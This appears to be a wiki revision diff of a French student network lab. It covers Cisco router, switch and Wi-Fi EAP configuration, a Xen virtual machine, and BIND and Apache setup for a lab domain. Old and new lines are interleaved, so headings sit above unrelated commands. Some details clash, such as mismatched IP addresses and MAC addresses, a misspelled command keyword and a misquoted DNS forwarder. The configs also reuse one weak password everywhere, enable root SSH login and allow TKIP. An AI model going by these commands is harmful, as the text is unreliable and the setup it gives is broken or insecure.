SE2A5-R1(config-ip-sla-echo)#exit
 
SE2A5-R1(config)#ip sla schedule 1 life forever start-time now
 
SE2A5-R1(config)#track 1 ip sla 1
 
SE2A5-R1(config-track)#exit
 
SE2A5-R1(config)#interface vlan 110
 
SE2A5-R1(config-if)#vrrp 10 track 1 decrement 50
 
SE2A5-R1(config-if)#exit
 
  
===Cisco Catalyst 9200===
+
<pre>SE2A5-AP2(config)#interface BVI 1
 +
SE2A5-AP2(config-if)#ip address 10.60.101.2 255.255.255.0
 +
SE2A5-AP2(config-if)#no shutdown
 +
SE2A5-AP2(config-if)#exit
 +
SE2A5-AP2(config)#ip default-gateway 10.60.101.254</pre>
 +
====       '''Réseau privé (VLAN 164) :''' ====
  
* Interface vers Cisco ISR 4331
+
* Configuration Wifi EAP :
SE2A5-R2(config)#interface g1/0/2
 
SE2A5-R2(config-if)#switchport
 
SE2A5-R2(config-if)#switchport trunk encapsulation dot1q
 
SE2A5-R2(config-if)#switchport mode trunk
 
SE2A5-R2(config-if)#switchport trunk allowed vlan 110
 
SE2A5-R2(config-if)#no shutdown
 
SE2A5-R2(config-if)#exit
 
* SLA
 
SE2A5-R2(config)#ip sla 1
 
SE2A5-R2(config-ip-sla)#icmp-echo 192.168.44.1
 
SE2A5-R2(config-ip-sla-echo)#frequency 300
 
SE2A5-R2(config-ip-sla-echo)#exit
 
SE2A5-R2(config)#ip sla schedule 1 life forever start-time now
 
SE2A5-R2(config)#track 1 ip sla 1
 
SE2A5-R2(config-track)#exit
 
SE2A5-R2(config)#interface vlan 110
 
SE2A5-R2(config-if)#vrrp 10 address-family ipv4
 
SE2A5-R2(config-if-vrrp)#track 1 decrement 50
 
SE2A5-R2(config-if-vrrp)#exit
 
SE2A5-R2(config-if)#exit
 
  
===Cisco ISR 4331===
+
<pre>SE2A5-AP2(config)#aaa authentication login EAP_DEMINEUR group RADIUS_DEMINEUR
 +
SE2A5-AP2(config)#radius-server host 10.60.100.164 auth-port 1812 acct-port 1813 key glopglop
 +
SE2A5-AP2(config)#aaa group server radius RADIUS_DEMINEUR
 +
SE2A5-AP2(config-server)#server 10.60.100.164 auth-port 1812 acct-port 1813
 +
SE2A5-AP2(config-server)#exit
 +
SE2A5-AP2(config)#dot11 ssid DEMINEUR2
 +
SE2A5-AP2(config-ssid)#mbssid guest-mode
 +
SE2A5-AP2(config-ssid)#vlan 164
 +
SE2A5-AP2(config-ssid)#authentication open eap EAP_DEMINEUR
 +
SE2A5-AP2(config-ssid)#authentication network-eap EAP_DEMINEUR
 +
SE2A5-AP2(config-ssid)#authentication key-management wpa
 +
SE2A5-AP2(config-ssid)#exit
 +
SE2A5-AP2(config)#interface dot11radio0.164
 +
SE2A5-AP2(config-subif)#encapsulation dot1q 164
 +
SE2A5-AP2(config-subif)#bridge-group 64
 +
SE2A5-AP2(config-subif)#exit
 +
SE2A5-AP2(config)#interface g0.164
 +
SE2A5-AP2(config-subif)#encapsulation dot1q 164
 +
SE2A5-AP2(config-subif)#bridge-group 64
 +
SE2A5-AP2(config-subif)#exit
 +
SE2A5-AP2(config)#interface dot11radio 0
 +
SE2A5-AP2(config-if)#no shutdown
 +
SE2A5-AP2(config-if)#encryption vlan 164 mode ciphers aes-ccm tkip
 +
SE2A5-AP2(config-if)#mbssid
 +
SE2A5-AP2(config-if)#ssid DEMINEUR2
 +
SE2A5-AP2(config-if)#exit</pre>
 +
= Machine virtuelle sur le serveur Capbreton =
  
====Configuration de base====
+
== Création de la machine virtuelle ==
  
switch>enable
+
* Connexion au serveur Capbreton :
switch#configure terminal
 
* Configuration du nom d’hôte
 
switch(config)#hostname SE2A5-R3
 
* Accès SSH
 
SE2A5-R3(config)#aaa new-model
 
SE2A5-R3(config)#username admin privilege 15 secret glopglop
 
SE2A5-R3(config)#ip domain-name plil.info
 
SE2A5-R3(config)#crypto key generate rsa
 
SE2A5-R3(config)#line vty 0 15
 
SE2A5-R3(config-line)#transport input ssh
 
SE2A5-R3(config-line)#exit
 
* Accès console
 
SE2A5-R3(config)#line console 0
 
SE2A5-R3(config-line)#password glopglop
 
SE2A5-R3(config-line)#login authentification AAA_CONSOLE
 
SE2A5-R3(config-line)#exit
 
* Sécurisation des accès
 
SE2A5-R3(config)#service password-encryption
 
SE2A5-R3(config)#enable secret glopglop
 
SE2A5-R3(config)#banner motd #Restricted Access#
 
* Activer le routage
 
SE2A5-R3(config)#ip routing
 
SE2A5-R3(config)#ipv6 unicast-routing
 
* Activer VRRP
 
SE2A5-R3(config)#license boot level network-advantage
 
SE2A5-R3(config)#fhrp version vrrp v3
 
  
====Pont vers le VLAN 532====
+
<pre>ssh capbreton.plil.info</pre>
 +
* Créer la variable d’environnement <code>http_proxy</code> :
  
* Bridge VLAN 532
+
<pre>export http_proxy=http://proxy.plil.fr:3128</pre>
SE2A5-R3(config)#interface bdi 532
+
En configurant correctement le proxy de la plateforme, il est désormais possible d’accéder aux images et aux paquets Debian pour créer la VM.
SE2A5-R3(config-if)#ip address 192.168.222.50 255.255.255.248
 
SE2A5-R3(config-if)#no shutdown
 
SE2A5-R3(config-if)#exit
 
* Interface d’interconnexion
 
SE2A5-R3(config)#interface g0/0/0
 
SE2A5-R3(config-if)#description INTERCO-1B
 
SE2A5-R3(config-if)#no shutdown
 
SE2A5-R3(config-if)#service instance 532 ethernet
 
SE2A5-R3(config-if-srv)#encapsulation untagged
 
SE2A5-R3(config-if-srv)#bridge-domain 532
 
SE2A5-R3(config-if-srv)#exit
 
SE2A5-R3(config-if)#exit
 
  
====Pont vers le VLAN 110====
+
* Création d’une image pour la VM :
  
*  Bridge VLAN 110
+
<pre>xen-create-image --hostname=demineur --ip=10.60.100.164 --gateway=10.60.100.254 --netmask=255.255.255.0 --dir=/usr/local/xen --password=glopglop --dist=buster</pre>
SE2A5-R3(config)#interface bdi 110
+
    → Dossier de stockage des données de la VM : <code>/usr/local/xen/domains/demineur</code><br />
SE2A5-R3(config-if)#ip address 10.60.100.3 255.255.255.0
+
    → Fichier de configuration de la VM : <code>/etc/xen/demineur.cfg</code>
SE2A5-R3(config-if)#vrrp 10 ip 10.60.100.254
 
SE2A5-R3(config-if)#vrrp 10 preempt
 
SE2A5-R3(config-if)#vrrp 10 priority 90
 
SE2A5-R3(config-if)#no shutdown
 
SE2A5-R3(config-if)#exit
 
* Interface vers Cisco Catalyst 6509-E
 
SE2A5-R3(config)#interface g0/0/3
 
SE2A5-R3(config-if)#description TP-NET1
 
SE2A5-R3(config-if)#no shutdown
 
SE2A5-R3(config-if)#service instance 110 ethernet
 
SE2A5-R3(config-if-srv)#encapsulation dot1q 110
 
SE2A5-R3(config-if-srv)#rewrite ingress tag pop 1 symmetric
 
SE2A5-R3(config-if-srv)#bridge-domain 110
 
SE2A5-R3(config-if-srv)#exit
 
SE2A5-R3(config-if)#exit
 
* Interface vers Cisco Catalyst 9200
 
SE2A5-R3(config)#interface g0/0/1
 
SE2A5-R3(config-if)#description TP-NET1
 
SE2A5-R3(config-if)#no shutdown
 
SE2A5-R3(config-if)#service instance 110 ethernet
 
SE2A5-R3(config-if-srv)#encapsulation dot1q 110
 
SE2A5-R3(config-if-srv)#rewrite ingress tag pop 1 symmetric
 
SE2A5-R3(config-if-srv)#bridge-domain 110
 
SE2A5-R3(config-if-srv)#exit
 
SE2A5-R3(config-if)#exit
 
  
====Translation NAT dynamique====
+
* Création des partitions virtuelles :
  
* NAT
+
<pre>vgcreate virtual /dev/sda7
SE2A5-R3(config)#interface vlan 532
+
lvcreate -L10G -n demineur-home virtual
SE2A5-R3(config-if)#ip nat outside
+
lvcreate -L10G -n demineur-var virtual</pre>
SE2A5-R3(config-if)#exit
+
* Vérification des partitions :
SE2A5-R3(config)#interface vlan 110
 
SE2A5-R3(config-if)#ip nat inside
 
SE2A5-R3(config-if)#exit
 
SE2A5-R3(config)#access-list 10 permit 193.48.57.160 0.0.0.15
 
SE2A5-R3(config)#ip nat pool NAT_POOL 213.215.6.101 213.215.6.101 netmask 255.255.255.255
 
SE2A5-R3(config)#ip nat inside source list 10 pool NAT_POOL overload
 
SE2A5-R3(config)#ip nat inside source static network 10.60.100.160 193.48.57.160 /28
 
  
==Paramétrage IPv6==
+
<pre>lvdisplay
 +
lsblk</pre>
 +
* Formatage de la partition virtuelle :
  
===Cisco Catalyst 6509-E===
+
<pre>mkfs.ext4 /dev/virtual/demineur-home
 +
mkfs.ext4 /dev/virtual/demineur-var</pre>
 +
* Modification de <code>/etc/xen/demineur.cfg</code> :
  
* Routage IPv6 - Protocole RIPv6
+
    → Ajout des partitions virtuelles dans la variable <code>disk</code> :
SE2A5-R1(config)#ipv6 router rip tpima2a5
 
SE2A5-R1(config-router)#redistribute connected metric 1
 
SE2A5-R1(config-router)#redistribute rip 1 metric 1
 
SE2A5-R1(config-router)#redistribute static metric 1
 
SE2A5-R1(config-router)#exit
 
* VLAN 530
 
SE2A5-R1(config)#interface vlan 530
 
SE2A5-R1(config-if)#ipv6 address fe80::2 link-local
 
SE2A5-R1(config-if)#ipv6 rip tpima2a5 enable
 
SE2A5-R1(config-if)#ipv6 enable
 
* VLAN 110
 
SE2A5-R1(config)#interface vlan 110
 
SE2A5-R1(config-if)#ipv6 address 2001:660:4401:60a0::/64 eui-64
 
SE2A5-R1(config-if)#ipv6 nd prefix 2001:660:4401:60a0::/64 1000 900
 
SE2A5-R1(config-if)#ipv6 nd router-preference high
 
SE2A5-R1(config-if)#ipv6 enable
 
SE2A5-R1(config-if)#exit
 
  
===Cisco Catalyst 9200===
+
<pre>'phy:/dev/virtual/demineur-home,xvda3,w',
 +
'phy:/dev/virtual/demineur-var,xvda4,w'</pre>
 +
    → Ajout du pont dans dans la variable <code>vif</code> :
  
* Routage IPv6 - Protocole RIPv6
+
<pre>vif = [ 'mac=00:16:3E:D8:97:68, bridge=IMA2a5' ]</pre>
SE2A5-R2(config)#ipv6 router rip tpima2a5
+
Le fichier de configuration obtenu est le suivant :
SE2A5-R2(config-router)#redistribute connected metric 2
 
SE2A5-R2(config-router)#redistribute rip 1 metric 2
 
SE2A5-R2(config-router)#redistribute static metric 2
 
SE2A5-R2(config-router)#exit
 
* VLAN 530
 
SE2A5-R2(config)#interface vlan 530
 
SE2A5-R2(config-if)#ipv6 address fe80::3 link-local
 
SE2A5-R2(config-if)#ipv6 rip tpima2a5 enable
 
SE2A5-R2(config-if)#ipv6 enable
 
* VLAN 110
 
SE2A5-R2(config)#interface vlan 110
 
SE2A5-R2(config-if)#ipv6 address 2001:660:4401:60a0::/64 eui-64
 
SE2A5-R2(config-if)#ipv6 nd prefix 2001:660:4401:60a0::/64 1000 900
 
SE2A5-R2(config-if)#ipv6 nd router-preference high
 
SE2A5-R2(config-if)#ipv6 enable
 
SE2A5-R2(config-if)#exit
 
  
===Cisco ISR 4331===
+
<pre>#
 +
# Configuration file for the Xen instance demineur, created
 +
# by xen-tools 4.8 on Fri Nov 12 08:53:11 2021.
 +
#
  
* Bridge VLAN 532
+
#
  SE2A5-R3(config)#interface bdi 532
+
# Kernel + memory size
SE2A5-R3(config-if)#ipv6 enable
+
#
SE2A5-R3(config-if)#exit
+
kernel      = '/boot/vmlinuz-4.19.0-9-amd64'
*  Bridge VLAN 110
+
extra      = 'elevator=noop'
SE2A5-R3(config)#interface bdi 110
+
ramdisk    = '/boot/initrd.img-4.19.0-9-amd64'
SE2A5-R3(config-if)#ipv6 enable
 
SE2A5-R3(config-if)#exit
 
  
==Configuration du VLAN 164==
+
vcpus      = '1'
 +
memory      = '256'
  
===Cisco Catalyst 6509-E===
 
  
* VLAN 164
+
#
SE2A5-R1(config)#vlan 164
+
Disk device(s).
SE2A5-R1(config-vlan)#name DEMINEUR
+
#
  SE2A5-R1(config-vlan)#exit
+
root        = '/dev/xvda2 ro'
SE2A5-R1(config)#interface vlan 164
+
disk        = [
SE2A5-R1(config-if)#description DEMINEUR
+
                  'file:/usr/local/xen/domains/demineur/disk.img,xvda2,w',
SE2A5-R1(config-if)#ip address 10.60.164.1 255.255.255.0
+
                  'file:/usr/local/xen/domains/demineur/swap.img,xvda1,w',
SE2A5-R1(config-if)#ipv6 address 2001:660:4401:60a4::/64 eui-64
+
                  'phy:/dev/virtual/demineur-home,xvda3,w',
SE2A5-R1(config-if)#ipv6 nd prefix 2001:660:4401:60a4::/64 1000 900
+
                  'phy:/dev/virtual/demineur-var,xvda4,w'
SE2A5-R1(config-if)#ipv6 nd router-preference high
+
              ]
SE2A5-R1(config-if)#ipv6 enable
 
SE2A5-R1(config-if)#no shutdown
 
SE2A5-R1(config-if)#vrrp 64 ip 10.60.164.254
 
SE2A5-R1(config-if)#vrrp 64 preempt
 
SE2A5-R1(config-if)#vrrp 64 priority 110
 
SE2A5-R1(config-if)#vrrp 64 track 1 decrement 50
 
SE2A5-R1(config-if)#exit
 
SE2A5-R1(config)#interface t5/4
 
SE2A5-R1(config-if)#switchport trunk allowed vlan add 164
 
SE2A5-R1(config-if)#exit
 
SE2A5-R1(config)#interface g3/1
 
SE2A5-R1(config-if)#switchport trunk allowed vlan add 164
 
SE2A5-R1(config-if)#exit
 
  
===Cisco Catalyst 9200===
 
  
* VLAN 164
+
#
SE2A5-R2(config)#vlan 164
+
Physical volumes
SE2A5-R2(config-vlan)#name DEMINEUR
+
#
SE2A5-R2(config-vlan)#exit
 
SE2A5-R2(config)#interface vlan 164
 
SE2A5-R2(config-if)#description DEMINEUR
 
SE2A5-R2(config-if)#ip address 10.60.164.2 255.255.255.0
 
SE2A5-R2(config-if)#ipv6 address 2001:660:4401:60a4::/64 eui-64
 
SE2A5-R2(config-if)#ipv6 nd prefix 2001:660:4401:60a4::/64 1000 900
 
SE2A5-R2(config-if)#ipv6 nd router-preference high
 
SE2A5-R2(config-if)#ipv6 enable
 
SE2A5-R2(config-if)#no shutdown
 
  SE2A5-R2(config-if)#vrrp 64 address-family ipv4
 
SE2A5-R2(config-if-vrrp)#address 10.60.164.254
 
SE2A5-R2(config-if-vrrp)#priority 100
 
SE2A5-R2(config-if-vrrp)#preempt
 
SE2A5-R2(config-if-vrrp)#exit
 
SE2A5-R2(config-if)#exit
 
SE2A5-R2(config)#interface t1/1/2
 
SE2A5-R2(config-if)#switchport trunk allowed vlan add 164
 
SE2A5-R2(config-if)#exit
 
SE2A5-R2(config)#interface g1/0/3
 
SE2A5-R2(config-if)#switchport trunk allowed vlan add 164
 
SE2A5-R2(config-if)#exit
 
  
==Configuration du Wifi==
 
  
===Cisco Catalyst 6509-E===
+
#
 +
#  Hostname
 +
#
 +
name        = 'demineur'
  
* DHCP
+
#
SE2A5-R1(config)#ip dhcp pool DEMINEUR
+
Networking
SE2A5-R1(dhcp-config)#dns 193.48.57.164
+
#
  SE2A5-R1(dhcp-config)#network 10.60.164.0 255.255.255.0
+
vif        = [ 'mac=00:16:3E:BE:BF:2D, bridge=IMA2a5' ]
SE2A5-R1(dhcp-config)#default-router 10.60.164.254
 
SE2A5-R1(dhcp-config)#exit
 
SE2A5-R1(config)#ip dhcp excluded-address 10.60.114.0 10.60.114.99
 
SE2A5-R1(config)#ip dhcp excluded-address 10.60.114.150 10.60.114.255
 
* Interface vers le point d'accès Wifi
 
SE2A5-R1(config)#interface t5/4
 
SE2A5-R1(config-if)#switchport
 
SE2A5-R1(config-if)#switchport trunk encapsulation dot1q
 
SE2A5-R1(config-if)#switchport mode trunk
 
SE2A5-R1(config-if)#no shutdown
 
SE2A5-R1(config-if)#exit
 
  
===Cisco Catalyst 9200===
+
#
 +
#  Behaviour
 +
#
 +
on_poweroff = 'destroy'
 +
on_reboot  = 'restart'
 +
on_crash    = 'restart'</pre>
 +
* Création de la VM :
  
* DHCP
+
<pre>xl create /etc/xen/demineur.cfg</pre>
SE2A5-R2(config)#ip dhcp pool DEMINEUR
+
* Affichage de l’état des VM :
SE2A5-R2(dhcp-config)#dns 193.48.57.164
 
SE2A5-R2(dhcp-config)#network 10.60.164.0 255.255.255.0
 
SE2A5-R2(dhcp-config)#default-router 10.60.164.254
 
SE2A5-R2(dhcp-config)#exit
 
SE2A5-R2(config)#ip dhcp excluded-address 10.60.114.0 10.60.114.149
 
SE2A5-R2(config)#ip dhcp excluded-address 10.60.114.200 10.60.114.255
 
* Interface vers le point d'accès Wifi
 
SE2A5-R2(config)#interface g1/0/2
 
SE2A5-R2(config-if)#switchport
 
SE2A5-R2(config-if)#switchport trunk encapsulation dot1q
 
SE2A5-R2(config-if)#switchport mode trunk
 
SE2A5-R2(config-if)#no shutdown
 
SE2A5-R2(config-if)#exit
 
  
===Point d'accès Wifi n°1===
+
<pre>xl list</pre>
 +
* Affichage du mot de passe de la VM :
  
====Configuration de base====
+
<pre>tail -f /var/log/xen-tools/demineur.log</pre>
 +
* Démarrage d’un shell sur la VM :
  
ap>enable
+
<pre>xen console demineur</pre>
ap#configure terminal
+
* Changement du mot de passe :
* Configuration du nom d’hôte
 
ap(config)#hostname SE2A5-AP1
 
* Accès SSH
 
SE2A5-AP1(config)#aaa new-model
 
SE2A5-AP1(config)#username admin privilege 15 secret glopglop
 
SE2A5-AP1(config)#ip domain-name plil.info
 
SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048
 
SE2A5-AP1(config)#ip ssh version 2
 
SE2A5-AP1(config)#line vty 0 15
 
SE2A5-AP1(config-line)#transport input ssh
 
SE2A5-AP1(config-line)#exit
 
* Accès console
 
SE2A5-AP1(config)#line console 0
 
SE2A5-AP1(config-line)#password glopglop
 
SE2A5-AP1(config-line)#login authentification AAA_CONSOLE
 
SE2A5-AP1(config-line)#exit
 
* Sécurisation des accès
 
SE2A5-AP1(config)#service password-encryption
 
SE2A5-AP1(config)#enable secret glopglop
 
SE2A5-AP1(config)#banner motd #Restricted Access#
 
  
====VLAN 164====
+
<pre>passwd root</pre>
 +
* Mise à jour de la liste des paquets :
  
* VLAN 164
+
<pre>apt update</pre>
SE2A5-AP1(config)#aaa authentication login EAP_DEMINEUR group RADIUS_DEMINEUR
+
* Montage des partitions virtuelles :
SE2A5-AP1(config)#radius-server host 193.48.57.164 auth-port 1812 acct-port 1813 key glopglop
 
SE2A5-AP1(config)#aaa group server radius RADIUS_DEMINEUR
 
SE2A5-AP1(config-server)#server 193.48.57.164 auth-port 1812 acct-port 1813
 
SE2A5-AP1(config-server)#exit
 
SE2A5-AP1(config)#dot11 ssid DEMINEUR1
 
SE2A5-AP1(config-ssid)#mbssid guest-mode
 
SE2A5-AP1(config-ssid)#vlan 164
 
SE2A5-AP1(config-ssid)#authentication open eap EAP_DEMINEUR
 
SE2A5-AP1(config-ssid)#authentication network-eap EAP_DEMINEUR
 
SE2A5-AP1(config-ssid)#authentication key-management wpa
 
SE2A5-AP1(config-ssid)#exit
 
SE2A5-AP1(config)#interface dot11radio0.164
 
SE2A5-AP1(config-subif)#encapsulation dot1q 164
 
SE2A5-AP1(config-subif)#bridge-group 64
 
SE2A5-AP1(config-subif)#exit
 
SE2A5-AP1(config)#interface g0.164
 
SE2A5-AP1(config-subif)#encapsulation dot1q 164
 
SE2A5-AP1(config-subif)#bridge-group 64
 
SE2A5-AP1(config-subif)#exit
 
SE2A5-AP1(config)#interface dot11radio 0
 
SE2A5-AP2(config-if)#no shutdown
 
SE2A5-AP1(config-if)#encryption vlan 164 mode ciphers aes-ccm tkip
 
SE2A5-AP1(config-if)#mbssid
 
SE2A5-AP1(config-if)#ssid DEMINEUR1
 
SE2A5-AP1(config-if)#exit
 
  
===Point d'accès Wifi n°2===
+
<pre>mount /dev/xvda4 /mnt</pre>
 +
* Copie des données des répertoires <code>/home</code> et <code>/var</code> :
  
====Configuration de base====
+
<pre>mv /var/* /mnt</pre>
 +
* Démontage des partitions virtuelles :
  
ap>enable
+
<pre>umount /mnt</pre>
ap#configure terminal
+
* Ajout des partitions au fichier <code>/etc/fstab</code> :
* Configuration du nom d’hôte
 
ap(config)#hostname SE2A5-AP2
 
* Accès SSH
 
SE2A5-AP2(config)#aaa new-model
 
SE2A5-AP2(config)#username admin privilege 15 secret glopglop
 
SE2A5-AP2(config)#ip domain-name plil.info
 
SE2A5-AP2(config)#crypto key generate rsa general-keys modulus 2048
 
SE2A5-AP2(config)#ip ssh version 2
 
SE2A5-AP2(config)#line vty 0 15
 
SE2A5-AP2(config-line)#transport input ssh
 
SE2A5-AP2(config-line)#exit
 
* Accès console
 
SE2A5-AP2(config)#line console 0
 
SE2A5-AP2(config-line)#password glopglop
 
SE2A5-AP2(config-line)#login authentification AAA_CONSOLE
 
SE2A5-AP2(config-line)#exit
 
* Sécurisation des accès
 
SE2A5-AP2(config)#service password-encryption
 
SE2A5-AP2(config)#enable secret glopglop
 
SE2A5-AP2(config)#banner motd #Restricted Access#
 
  
====VLAN 164====
+
<pre>/dev/xvda3 /home ext4 defaults 0 2
 +
/dev/xvda4 /var ext4 defaults 0 2</pre>
 +
== Serveur SSH ==
  
* VLAN 164
+
* Modification du fichier <code>/etc/ssh/sshd_config</code> :
SE2A5-AP2(config)#aaa authentication login EAP_DEMINEUR group RADIUS_DEMINEUR
 
SE2A5-AP2(config)#radius-server host 193.48.57.164 auth-port 1812 acct-port 1813 key glopglop
 
SE2A5-AP2(config)#aaa group server radius RADIUS_DEMINEUR
 
SE2A5-AP2(config-server)#server 193.48.57.164 auth-port 1812 acct-port 1813
 
SE2A5-AP2(config-server)#exit
 
SE2A5-AP2(config)#dot11 ssid DEMINEUR2
 
SE2A5-AP2(config-ssid)#mbssid guest-mode
 
SE2A5-AP2(config-ssid)#vlan 164
 
SE2A5-AP2(config-ssid)#authentication open eap EAP_DEMINEUR
 
SE2A5-AP2(config-ssid)#authentication network-eap EAP_DEMINEUR
 
SE2A5-AP2(config-ssid)#authentication key-management wpa
 
SE2A5-AP2(config-ssid)#exit
 
SE2A5-AP2(config)#interface dot11radio0.164
 
SE2A5-AP2(config-subif)#encapsulation dot1q 164
 
SE2A5-AP2(config-subif)#bridge-group 64
 
SE2A5-AP2(config-subif)#exit
 
SE2A5-AP2(config)#interface g0.164
 
SE2A5-AP2(config-subif)#encapsulation dot1q 164
 
SE2A5-AP2(config-subif)#bridge-group 64
 
SE2A5-AP2(config-subif)#exit
 
SE2A5-AP2(config)#interface dot11radio 0
 
SE2A5-AP2(config-if)#no shutdown
 
SE2A5-AP2(config-if)#encryption vlan 164 mode ciphers aes-ccm tkip
 
SE2A5-AP2(config-if)#mbssid
 
SE2A5-AP2(config-if)#ssid DEMINEUR2
 
SE2A5-AP2(config-if)#exit
 
  
=Machine virtuelle sur le serveur Capbreton=
+
<pre>PermitRootLogin yes</pre>
 +
== Configuration IP ==
  
* Connexion au serveur Capbreton:
+
* Modification du fichier <code>/etc/network/interfaces</code> :
ssh capbreton.plil.info
 
  
* Créer une image xen:
+
<pre>auto lo
xen-create-image --hostname=demineur --ip=10.60.164.222 --gateway=10.60.164.254 --netmask=255.255.255.0 --dir=/usr/local/xen --password=pasglop --dist=buster
+
iface lo inet loopback
  
* Création d'une partition de 10Go pour la machine virtuelle:
+
auto eth0
lvcreate -L10G -n net-gp4 storage
+
iface eth0 inet6 auto
 +
iface eth0 inet static
 +
    address 10.60.100.164/24
 +
    up ip address add dev eth0 193.48.57.164/32
 +
    up ip route add default via 10.60.100.254 src 193.48.57.164
 +
    down ip address del dev eth0 193.48.57.164/32
 +
    down ip route del default via 10.60.100.254 src 193.48.57.164</pre>
 +
== Serveur DNS ==
  
* Formatage de la partition au format EXT4:
+
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine <code>demineur.site</code>.<br />
mkfs.ext4 /dev/storage/demineur
+
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :<br />
 +
  → Ajouter le Glue Record vers <code>193.48.57.164</code> afin d’associer le nom de domaine <code>demineur.site</code> à l’adresse IP <code>193.48.57.164</code><br />
 +
  → Modifier les serveurs de noms pour utiliser <code>ns.demineur.site</code> et <code>ns6.gandi.net</code><br />
 +
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :<br />
 +
  → Modifier l’enrgistrement DNS <code>@</code>-<code>A</code> avec la valeur <code>193.48.57.193</code><br />
 +
  → Ajouter l’enrgistrement DNS <code>ns</code>-<code>A</code> avec la valeur <code>193.48.57.193</code><br />
 +
  → Modifier l’enrgistrement DNS <code>www</code>-<code>CNAME</code> avec la valeur <code>ns.demineur.site.</code>
  
* Modifier le fichier de configuration de la VM:
+
* Installation du paquet <code>bind9</code>
disk = [
 
'file:/usr/local/xen/domains/demineur/swap.img,xvda1,w',
 
'file:/usr/local/xen/domains/demineur/disk.img,xvda2,w',
 
'phy:/dev/storage/demineur,xvda3,w',
 
]
 
  
* Création de la VM:
+
<pre>apt install bind9</pre>
xl create -c /etc/xen/demineur.cfg
+
* Modification du fichier <code>/etc/resolv.conf</code> :
  
=Résumé des séances=
+
<pre>nameserver 127.0.0.1</pre>
 +
* Modification du fichier <code>/etc/bind/named.conf.local</code> :
  
==Jeudi 16/09/2021 10h-12h==
+
<pre>zone &quot;demineur.site&quot; {
 +
    type master;
 +
    file &quot;/etc/bind/db.demineur.site&quot;;
 +
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net
 +
};</pre>
 +
* Modification du fichier <code>/etc/bind/named.conf.options</code> :
  
Tâches effectuées :
+
<pre>options{
* Plan d'adressage
+
  directory &quot;/var/cache/bind&quot;;
 +
  forwarders {
 +
    8.8.8.8;
 +
    4.4.2.2;
 +
  };
 +
  dnssec-validation auto;
 +
  listen-on-v6 { any; };
 +
  allow-transfer { &quot;allowed_to_transfer&quot;; };
 +
};
 +
acl &quot;allowed_to_transfer&quot; {
 +
  217.70.177.40/32;
 +
};</pre>
 +
* Créer le fichier BIND pour <code>demineur.site</code> :
 +
 
 +
<pre>cp /etc/bind/db.local /etc/bind/db.demineur.site</pre>
 +
* Modification du fichier <code>/etc/bind/db.demineur.site</code> :
 +
 
 +
<pre>;
 +
; BIND data file for demineur.site
 +
;
 +
$TTL    604800
 +
@      IN      SOA    ns.demineur.site. root.demineur.site. (
 +
                              1        ; Serial
 +
                        604800        ; Refresh
 +
                          86400        ; Retry
 +
                        2419200        ; Expire
 +
                        604800 )      ; Negative Cache TTL
 +
;
 +
@  IN  NS  ns.demineur.site.
 +
@  IN  NS  ns6.gandi.net.
 +
@  IN  A  193.48.57.164
 +
NS  IN  A  193.48.57.164
 +
NS  IN  AAAA    2001:7A8:116E:60A4::1
 +
WWW IN  CNAME  NS
 +
SSH IN  CNAME  NS</pre>
 +
* Redémarrage du service <code>bind9</code> :
 +
 
 +
<pre>service bind9 restart</pre>
 +
=== Tester DNS : ===
 +
 
 +
* Modification du fichier <code>/etc/resolv.conf</code>
 +
 
 +
<pre>nameserver 193.48.57.164</pre>
 +
* Vérification de la traduction du nom de domaine <code>demineur.site</code> :
 +
 
 +
<pre>nslookup demineur.site</pre>
 +
== Serveur Web ==
 +
 
 +
* Installation du paquet <code>openssl</code> :
 +
 
 +
<pre>apt install openssl</pre>
 +
* Création d’un certificat TSL :
 +
 
 +
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout demineur.site.key -out demineur.site.csr</pre>
 +
Attention à bien renseigner <code>demineur.site</code> comme CN (Common Name) pour la création du certificat.
 +
 
 +
<pre>mv demineur.site.key /etc/ssl/private
 +
mv demineur.site.csr /etc/ssl/certs</pre>
 +
Il est nécessaire de faire signer le certificat <code>.csr</code> par un registrar tel que [https://letsencrypt.org/fr/ Let’s Encrypt] ou [https://docs.gandi.net/fr/ssl/creation/installation_certif_manuelle.html Gandi] afin d’en obtenir le nouveau certificat signé <code>.crt</code>.<br />
 +
Puisque le registrar Gandi a été utilisé pour réserver le nom de domaine <code>demineur.site</code>, il est alors possible d’utiliser à nouveau ce service pour signer gratuitement le certificat <code>demineur.site.csr</code>.
 +
 
 +
Pour cela, il faut “acheter” un certificat SSL pour un hôte “ailleurs” et coller le contenu du fichier <code>.csr</code>. Une fois le CN entré et reconnu, l’achat devient gratuit et peut être effectué.<br />
 +
Après quelques minutes, il est désormais possible de télécharger le certificat signé <code>.crt</code> ainsi que le certificat nommé <code>GandiStandardSSLCA2.pem</code>.
 +
 
 +
Ces deux certificats sont à copier dans le répertoire <code>/etc/ssl/certs</code> de la VM.
 +
 
 +
* Copier les certificats sur la VM :
 +
 
 +
<pre>scp -r -p demineur.site.crt root@193.48.57.164:/etc/ssl/certs
 +
scp -r -p GandiStandardSSLCA2.pem root@193.48.57.164:/etc/ssl/certs</pre>
 +
* Installation du paquet <code>apache2</code> :
 +
 
 +
<pre>apt install apache2</pre>
 +
* Activation du module SSL :
 +
 
 +
<pre>a2enmod ssl</pre>
 +
* Modification du fichier <code>/etc/apache2/ports.conf</code> :
 +
 
 +
<pre>Listen 80
 +
 
 +
&lt;IfModule mod_ssl.c&gt;
 +
  Listen 443
 +
&lt;/IfModule&gt;
 +
&lt;IfModule mod_gnutls.c&gt;
 +
  Listen 443
 +
&lt;/IfModule&gt;</pre>
 +
* Ajout du fichier <code>/etc/apache2/sites-available/000-demineur.site-ssl.conf</code> :
 +
 
 +
<pre>&lt;IfModule mod_ssl.c&gt;
 +
        &lt;VirtualHost 193.48.57.164:443&gt;
 +
                ServerName demineur.site
 +
                ServerAlias ns.demineur.site www.demineur.site
 +
                DocumentRoot /var/www/demineur.site/
 +
                CustomLog /var/log/apache2/secure_access.log combined
 +
                SSLEngine on
 +
                SSLCertificateFile /etc/ssl/certs/demineur.site.crt
 +
                SSLCertificateKeyFile /etc/ssl/private/demineur.site.key
 +
                SSLCACertificateFile /etc/ssl/certs/GandiStandardSSLCA2.pem
 +
                SSLVerifyClient None
 +
        &lt;/VirtualHost&gt;
 +
&lt;/IfModule&gt;</pre>
 +
